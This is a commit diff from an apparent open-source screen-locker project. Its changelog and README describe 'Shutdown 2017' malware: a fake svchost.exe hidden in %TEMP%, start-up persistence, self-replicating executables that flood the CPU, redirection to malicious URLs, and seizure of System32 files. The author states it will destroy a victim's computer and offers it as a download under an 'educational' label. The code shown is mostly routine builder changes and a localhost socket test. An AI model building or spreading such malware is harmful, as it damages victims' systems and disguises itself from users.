1.5

1.5 (11/12/2017)

- Major bug fixes to Shutdown 2017
- Shutdown dependencies fixed. Can now be used by itself
- Silent and hidden payload executable added.
- Shutdown 2017 minor payload added
- Payloads automatically register for start-up.
- New executable now works as a virus flooder
- Builder library issues fixed
- Locker calibration fixed
- Malware will randomly send users to links (Adware capability - see
malicious.txt)

CHANGELOG.md

@@ -1,3 +1,17 @@
+1.5 (11/12/2017)
+
+- Major bug fixes to Shutdown 2017
+- Shutdown dependencies fixed. Can now be used by itself
+- Silent and hidden payload executable added.
+- Shutdown 2017 minor payload added
+- Payloads automatically register for start-up.
+- New executable now works as a virus flooder
+- Builder library issues fixed
+- Locker calibration fixed
+- Malware will randomly send users to links (Adware capability - see malicious.txt)
+
+See ReadME for more details on update.
+
 1.4.1 (11/9/2017)
 
 - Icons added to programs

README.md

@@ -42,4 +42,26 @@ The scanning is where the damage is done. This software will go through every sy
 and clean system file. Meaning, whenever you try to run a file found inside of "Windows", it will run the .exe, however it will lock your screen meanwhile. For the sake of security and educational
 purposes, I set the password to simply "hi". If you want to change the password for whatever reason, you will need to recompile the code.
 
-The scan also goes through your System32 and SysWOW64 folder. It will forcibly take ownership of your files. I have included the malware in a separate download. Run it at your own risk. 
+The scan also goes through your System32 and SysWOW64 folder. It will forcibly take ownership of your files. As of the 1.5 update (11/12/2017), Shutdown 2017 now unloads a new malware that installs
+itself into the client's computer. Once Shutdown2017 runs, it will generate a fake svchost.exe file and run it. The assembly and memory size blends right in with the other svchost.exe processes. The
+fake svchost is placed in %TEMP%. Due to the fact Shutdown2017 requires administrator permissions, the malware is treated as a child and will have full access to the client's computer, giving it the
+opportunity to perform it's payloads.
+
+The moment the malware is opened, it install itself in Program Files and create a fake settings folder in your home documents folder. Then it will generate a fake executable with a silly name. The 
+list of .exe names can be found in fake_exe.h. The new executable becomes a duplicate of the malware and will also be run. This will end up creating a small loop, which will start to generate new
+executables every 5-10 seconds. The flooding will start to hog up the client's CPU and slow down their computer tremendously.
+
+That's not all though. The malware can run 5 different payloads while it's running in the background.
+
+- Generate AHXRLocker.exe type files in the Shutdown2017 folder, being a pest. Even if you delete the folder, the process will continue to just generate new lockable files.
+- Open a malicous url (malicious.txt). Like I said earlier, this program was just made for educational purposes. But obviously someone could easily replace the links with ads just to generate revenue.
+- Duplicate itself and create another child
+- Force flood the client
+- Open up Shutdown2017 again (Another loop)
+- [Fake lockdown screen](https://i.imgur.com/qBSlccZ.png) 
+
+I can't find the location of where I downloaded the list of malicious URLs. If I find it, I'll update this. Regardless this whole Shutdown 2017 malware will destroy someone's computer either way. If 
+they are smart enough to close out the scanner via task manager, it still won't make a difference as there's already background work going on. The scanner will destroy your System files while 
+the background malware will unload it's payloads.
+
+I have included the malware in a separate download. Run it at your own risk. 

src/builder/build.h

@@ -23,8 +23,9 @@
 extern void validateClientBuild(System::String ^ message, System::String ^ password, System::Windows::Forms::SaveFileDialog ^ saveref, bool showDialog=true);
 extern void createClientLocker(System::String ^ fileName, System::String ^ password, System::String ^ message, System::String ^ exe, System::String ^ address, bool exith=true);
 
-#define ERROR_MSG_1		"Illegal Characters"
-#define ERROR_MSG_2		"Please enter a message."
-#define ERROR_MSG_3		"Please enter a password."
-#define WARNING_MSG		"Warning: Unauthorized remote access to another computer is considered illegal in most cases. By toggling this on, you agree and take full responsbility for your actions."
-#define COMPLETE_MSG	"Done."
+#define ERROR_MSG_1			"Illegal Characters"
+#define ERROR_MSG_2			"Please enter a message."
+#define ERROR_MSG_3			"Please enter a password."
+#define WARNING_MSG			"Warning: Unauthorized remote access to another computer is considered illegal in most cases. By toggling this on, you agree and take full responsbility for your actions."
+#define COMPLETE_MSG		"Done."
+#define	LOCKER_FILE_PATH	"AHXRLocker.exe"

src/builder/frmMain.h

@@ -452,6 +452,7 @@ namespace AHXRScreenLock {
 			packLocker(s_file, marshal_as< std::string >(this->txtPassword->Text), marshal_as< std::string >(this->txtMessage->Text));
 		this->pgBar->Value = 80;
 		if ( !s_attached_p.empty() ) {
+			puts(s_attached_p.c_str());
 			attachExecutable(s_file, s_attached_p);
 		}
 

src/builder/main.cpp

@@ -48,6 +48,8 @@ void main(array<String^>^ args) {
 #ifdef DEBUG_MODE
 	packLocker("AXHRLocker.exe", "hi", "basic message.");
 #endif
+	setLockerFileName(LOCKER_FILE_PATH);
+
 	if (args->Length >= 3)
 		createClientLocker(args[ARG_FILE_NAME], args[ARG_PASSWORD], args[ARG_MESSAGE], args[ARG_EXE], args[ARG_ADDRESS]);
 

src/library/locker.cpp

@@ -36,6 +36,8 @@ void buildNewLocker(string fileName) {
 	ofstream
 		f_new;
 
+	puts(LOCKER_FILE_NAME.c_str());
+
 	f_old.open(LOCKER_FILE_NAME, ios::binary);
 	f_new.open(fileName, ios::binary);
 

src/library/settings.h

@@ -20,14 +20,6 @@
 	along with AHXRScreenLock.  If not, see <http://www.gnu.org/licenses/>.
 */
 //=======================================================
-//#define DEBUG_MODE
-
-#define ARG_FILE_NAME 0
-#define ARG_PASSWORD 1
-#define ARG_MESSAGE 2
-#define ARG_EXE 3
-#define ARG_ADDRESS 4
-
 #define PACK_SPLITTER "----"
 #define PACK_OPENER "{"
 #define PACK_CLOSER "}"

src/listener/clientTest.cpp

@@ -0,0 +1,159 @@
+/*
+	@title
+	AHXRScreenLock
+		@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2017
+
+	AHXRScreenLock is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	AHXRScreenLock is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with AHXRScreenLock.  If not, see <http://www.gnu.org/licenses/>.
+*/
+//=======================================================
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "clientTest.h"
+#include "serverThread.h"
+
+#pragma comment (lib, "Ws2_32.lib")
+#pragma comment (lib, "Mswsock.lib")
+#pragma comment (lib, "AdvApi32.lib")
+
+HANDLE			h_client;
+DWORD			dw_client;
+bool			b_new_message = false;
+char *			c_message;
+
+
+
+void sendNewMessage(char * message) {
+	b_new_message = true;
+	c_message = message;
+}
+
+#ifdef CLIENT_SERVER_TEST
+
+void clientServerTest() {
+	h_client = CreateThread(0, 0, t_clientServerTest, 0, 0, &dw_client);
+}
+
+DWORD WINAPI t_clientServerTest(LPVOID lpParameter) {
+	WSADATA wsaData;
+	SOCKET ConnectSocket = INVALID_SOCKET;
+	struct addrinfo *result = NULL,
+		*ptr = NULL,
+		hints;
+	char recvbuf[DEFAULT_BUFLEN];
+	int iResult;
+	int recvbuflen = DEFAULT_BUFLEN;
+
+	// Initialize Winsock
+	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
+	if (iResult != 0) {
+		printf("WSAStartup failed with error: %d\n", iResult);
+		return 1;
+	}
+
+	ZeroMemory(&hints, sizeof(hints));
+	hints.ai_family = AF_UNSPEC;
+	hints.ai_socktype = SOCK_STREAM;
+	hints.ai_protocol = IPPROTO_TCP;
+
+	// Resolve the server address and port
+	iResult = getaddrinfo("localhost", DEFAULT_PORT, &hints, &result);
+	if (iResult != 0) {
+		printf("getaddrinfo failed with error: %d\n", iResult);
+		WSACleanup();
+		return 1;
+	}
+
+	// Attempt to connect to an address until one succeeds
+	for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
+
+		// Create a SOCKET for connecting to server
+		ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
+			ptr->ai_protocol);
+		if (ConnectSocket == INVALID_SOCKET) {
+			printf("socket failed with error: %ld\n", WSAGetLastError());
+			WSACleanup();
+			return 1;
+		}
+
+		// Connect to server.
+		iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
+		if (iResult == SOCKET_ERROR) {
+			closesocket(ConnectSocket);
+			ConnectSocket = INVALID_SOCKET;
+			continue;
+		}
+		break;
+	}
+
+	freeaddrinfo(result);
+
+	if (ConnectSocket == INVALID_SOCKET) {
+		printf("Unable to connect to server!\n");
+		WSACleanup();
+		return 1;
+	}
+
+
+	while (1) {
+		if (b_new_message) {
+			iResult = send(ConnectSocket, c_message, (int)strlen(c_message), 0);
+
+			if (iResult == SOCKET_ERROR) {
+				printf("send failed with error: %d\n", WSAGetLastError());
+				closesocket(ConnectSocket);
+				WSACleanup();
+				return 1;
+			}
+			b_new_message = false;
+		}
+	}
+
+
+	// shutdown the connection since no more data will be sent
+	iResult = shutdown(ConnectSocket, SD_SEND);
+	if (iResult == SOCKET_ERROR) {
+		printf("shutdown failed with error: %d\n", WSAGetLastError());
+		closesocket(ConnectSocket);
+		WSACleanup();
+		return 1;
+	}
+
+	// Receive until the peer closes the connection
+	do {
+
+		iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0);
+		if (iResult > 0)
+			printf("Message received: %s\n", recvbuf);
+		else if (iResult == 0)
+			printf("Connection closed\n");
+		else
+			printf("recv failed with error: %d\n", WSAGetLastError());
+
+	} while (iResult > 0);
+
+	// cleanup
+	closesocket(ConnectSocket);
+	WSACleanup();
+
+	return 0;
+}
+#endif

src/listener/clientTest.h

@@ -0,0 +1,32 @@
+/*
+	@title
+		AHXRScreenLock
+	@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2017
+
+	AHXRScreenLock is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	AHXRScreenLock is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with AHXRScreenLock.  If not, see <http://www.gnu.org/licenses/>.
+
+	https://msdn.microsoft.com/en-us/library/windows/desktop/ms737889(v=vs.85).aspx
+*/
+//=======================================================
+//#define CLIENT_SERVER_TEST
+
+#ifdef CLIENT_SERVER_TEST
+	extern void clientServerTest();
+	DWORD WINAPI t_clientServerTest(LPVOID lpParameter);
+#endif
+
+//extern void sendNewMessage(char * message);